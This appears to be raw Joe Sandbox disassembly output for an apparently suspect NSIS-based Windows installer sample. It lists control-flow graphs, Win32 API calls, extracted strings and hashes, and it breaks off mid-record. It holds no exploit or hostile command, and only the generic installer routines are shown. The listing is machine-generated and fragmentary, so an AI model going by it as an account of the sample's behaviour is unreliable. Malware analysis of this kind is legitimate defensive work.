                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                      • API String ID: 2872004960-3619442763
                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                      • ShowWindow.USER32(?), ref: 004054FE
                                      • DestroyWindow.USER32 ref: 00405512
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                      • EnableWindow.USER32(?,?), ref: 00405783
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID:
                                      • API String ID: 3282139019-0
                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                      APIs
                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 608394941-2746725676
                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • lstrcatW.KERNEL32(00000000,00000000,SortsCestVoltageEfficiency,004D70B0,00000000,00000000), ref: 00401A76
                                      • CompareFileTime.KERNEL32(-00000014,?,SortsCestVoltageEfficiency,SortsCestVoltageEfficiency,00000000,00000000,SortsCestVoltageEfficiency,004D70B0,00000000,00000000), ref: 00401AA0
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SortsCestVoltageEfficiency
                                      • API String ID: 4286501637-3296979505
                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004033F1
                                      • GetTickCount.KERNEL32 ref: 00403492
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                      • wsprintfW.USER32 ref: 004034CE
                                      • WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CountFileTickWrite$wsprintf
                                      • String ID: (]C$... %d%%$pAB$vyB$y9B
                                      • API String ID: 651206458-2231457358
                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004035C4
                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                      Strings
                                      • soft, xrefs: 004036A1
                                      • Error launching installer, xrefs: 00403603
                                      • Inst, xrefs: 00403698
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                      • Null, xrefs: 004036AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-527102705
                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                      APIs
                                      • lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                      • lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                      • String ID:
                                      • API String ID: 2740478559-0
                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                      APIs
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
